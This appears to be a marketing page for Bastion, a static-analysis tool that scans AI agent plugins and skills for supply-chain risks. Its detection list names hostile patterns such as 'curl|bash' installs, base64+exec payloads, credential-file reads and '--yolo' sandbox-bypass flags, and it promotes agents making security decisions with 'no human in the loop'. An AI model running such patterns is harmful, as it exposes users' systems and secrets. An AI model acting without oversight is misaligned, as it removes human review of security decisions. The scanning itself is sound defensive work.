Supply-Chain Security
for AI Agents
Scan AI agent plugins and skills for security risks. Detect capability drift, surface hidden behaviors, and verify trust before deploying.
Deep static analysis across Python, JavaScript, and TypeScript — no runtime required.
pip install bastion-ai-security
"I built Bastion to protect bots and AI agents as we head into a bot-first world. With platforms like OpenClaw and ai.com enabling autonomous agents at scale, the supply chain for AI skills and plugins needs the same security scrutiny we give to traditional software dependencies."
The Most Downloaded ClawHub Skill Was Malware
The most popular skill on OpenClaw's ClawHub marketplace turned out to be an infostealer (Atomic Stealer/AMOS) disguised as a legitimate tool. Over 800 malicious skills were discovered, targeting crypto wallets, passwords, and credentials. No code review, no sandboxing, no security scanning was in place.
Bastion scans for exactly these threats — before they reach your agents.
Your AI Agent's Plugins Could Be Doing Anything
AI agents rely on third-party plugins that can access your filesystem, make network requests, read secrets, and execute arbitrary code. Most teams have zero visibility into what these plugins actually do.
Two Ways to Use Bastion
CLI for developers or MCP integration for autonomous AI agents
Human-Operated CLI
You run scans, review results in the terminal, and make security decisions. Connect to the cloud dashboard for monitoring, trust scores, and verification.
AI Agent Integration (MCP)
Your AI agent uses Bastion as a security tool via MCP. It scans plugins, checks trust scores, and makes security decisions autonomously — no human in the loop.
Both paths produce the same security artifacts, trust scores, and detection coverage across all 11 capability categories.
Everything You Need to Secure AI Agents
Discovery, analysis, drift detection, trust scores, and CI/CD integration
Plugin Discovery
Auto-discovers plugins and skills across Python, JavaScript, and TypeScript projects. No manual configuration required.
Deep Static Analysis
AST-based analysis detecting 11 capability categories including dependency chain scanning across Python, JavaScript, TypeScript, and SKILL.md — from system execution to privilege escalation.
Drift Detection
Tracks changes between scans and alerts on new capabilities. Catch permission escalations before they become threats.
Remediation Guidance
Get actionable fix suggestions for every finding. Each detected capability includes specific remediation steps to secure your plugins.
Security Policy
Acknowledge known capabilities to reduce alert fatigue. Define a policy.yaml to track accepted risks without losing visibility.
Dependency Scanning
Analyze package.json, requirements.txt, and other dependency files for supply-chain risks including typosquats, URL installs, and unpinned versions.
Trust Scores
Quantified security scoring from 0–100. Portable trust scores that platforms and marketplaces can verify via API.
AI Bill of Materials
Generate machine-readable AIBOM documents. Complete security documentation for every plugin in your agent ecosystem.
CI/CD Integration
Non-zero exit codes on high/critical findings. Block unsafe deploys automatically in your existing pipeline.
MCP Server Integration
Use Bastion as an MCP server for AI agents. Scan directories, analyze files, and check trust scores directly from Claude, Cursor, or any MCP-compatible client.
OpenClaw Security
Purpose-built analysis for OpenClaw SKILL.md files. Detects dangerous bash commands, sandbox bypass flags, and external URL patterns in agent skill definitions.
What Bastion Detects
Ten capability categories analyzed through deep AST inspection
System Execution
subprocess, os.system, child_process
Network Access
HTTP requests, socket connections
Secret Access
Environment variables, credential files
Dynamic Code
eval, exec, Function constructor
Obfuscation
base64+exec, encoded payloads
File System Access
open, pathlib, fs module, glob
Sandbox Bypass
--yolo flags, elevated:true, sandbox escape
Install Risk
curl|bash, sudo, pip from URLs
Hardcoded Secrets
AWS keys, API tokens, passwords in source
Privilege Escalation
Combined exec + network + secrets
Up and Running in 4 Commands
From install to cloud-monitored security in under a minute
Install
pip install bastion-ai-security
Initialize
bastion init
Connect
bastion connect
Scan
bastion scan
Monitor Everything from One Place
Connect your local Bastion projects to the cloud for centralized security monitoring, historical tracking, and verification APIs.
- Centralized monitoring across all your projects
- Historical scan tracking and drift timeline
- Trust score verification API for platforms and marketplaces
- Real-time alerts on capability drift and risk changes
Project Overview
All VerifiedStart Securing Your AI Agents
Open source, free to use, and ready in under a minute. Install locally or connect to the cloud dashboard.
pip install bastion-ai-security